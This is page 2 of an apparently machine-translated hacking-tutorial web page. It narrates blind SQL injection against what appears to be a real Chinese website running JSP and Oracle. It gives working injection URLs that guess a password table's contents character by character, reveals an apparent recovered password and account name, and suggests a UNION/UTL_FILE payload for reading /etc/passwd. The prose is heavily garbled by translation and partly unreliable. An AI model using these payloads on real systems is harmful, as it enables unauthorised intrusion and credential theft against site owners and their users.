Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > hacker course > Content
Hot Articles
SmoothWall Introduces Lo
Travel of the JSP+Oracle
Hacker skill: Gains Webs
Breaks through the Inter
MYSQL database injection
The Tomcat backstage tak
Breaks through the Inter
The hacker teaches you a
WinHex pursues the code
How does the hacker dest
How teaches you to take
The SQL injection revise
mssql SA jurisdiction ne
Microsoft SQL Server SA
The bored Css cross stat
Recommend Articles
The SQL injection revise
How does the hacker dest
The new military recruit
Union inquires the small
MYSQL database injection
Invades under new skill
How does the website scr
Smells searches works as
How in does the net seep
Microsoft SQL Server SA
A simple invasion, does
The mainstream raises th
The bored Css cross stat
The random combined comm
The hacker teaches you a
New Articles
Check Point offers compa
The malware spreads Cali
Full Disk Encryption pro
Cardholders should take
U.S. still more spam tha
Strong encryption L?solu
ConvexSoft DJ Audio Mixe
Few companies k?can be i
IT professionals can kee
k the media?can not by s
k the media?can not by s
Google Custom Search Eng
Users of the iPhone and
Gateshead College offers
Manchester obtained pass
Travel of the JSP+Oracle SQL Injection(2)
  Add date: 07/24/2008   Publishing date: 07/24/2008   Hits: 256
Total 2 pages, Current page:2, Jump to page:
 


 

Figure 3

The above process is very arid, has died many brain cells, thinks and guessed that Access is the same. If Oracle had looks like MSSQL the second year direct storm storehouse, the table method to be in every month good. Ha-ha, the matter then, was certainly needs to do the user name and the password. Come on! Has a look at smallest STAFF_ID the value is how many:

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797' and 1= (select min(STAFF_ID) from T_PASSWD) and '1 ' = ' 1

Returns normally. Ha-ha, does not want to be polite it is our goal, does its Password first. The good play needed to perform, really also wanted to have a look at "Hacker Empire" in animation:

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797' and 0 (select conut(*) from T_PASSWD where substr(PASSWORD,1,1)='1' and STAFF_ID=1) and '1 ' = ' 1

Certainly everybody may also use Ascii () the function to guess that has said about this aspect very seniors, here no longer gives the explanation, otherwise the editor said that I deceived the payment for published piece, ha-ha. Could not guess correctly that 10 minutes came out the password: “19791108”, are probably the birthday. Had the password, did not have the user not to be good, the matter then simply have been many:

http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797' and 0 (select conut(*) from T_PASSWD where substr(STS,1,1)='1' and STAFF_ID='T') and '1 ' = ' 1

Comes gradually. The step and above the wide difference, has not had a look at the length first, then one each one guessed. This in guessed time uses the time on a point, has spent my 25 minutes to obtain the account is finally steadily: “TANGBIN”, poured into the process official conclusion!

Finally supplements several points: If opens Public group UTL_FILE to have the possibility to read on server's document, if the establishment mistake, may obtain any document, for example: Reads out the /etc/passwd document, but it must with the Union union use, for example: union select 'hoge', '. /. /. /. /. /etc/passwd', '1', '1', '1' from SOMETABLE--. Inquires about Union, black against seven issue on angel PHP poured into the article already to introduce quite in detail: The front sentence must construct creating a false impression the condition, can return to the following inquiry. Certainly, you may also attempt Update, Insert, the cross storehouse and so on, if you want to know that answer, you come! Believed that the black against near future will publish such article. Certainly if you have any good means or the material, remembers for me.
 
 
 


 
Other pages: : <<Prev * 1 * 2
Prev:Invades the ASP.net website an experience Next:About cross territory worm's existence

Comment:

Category: Home > hacker course
Home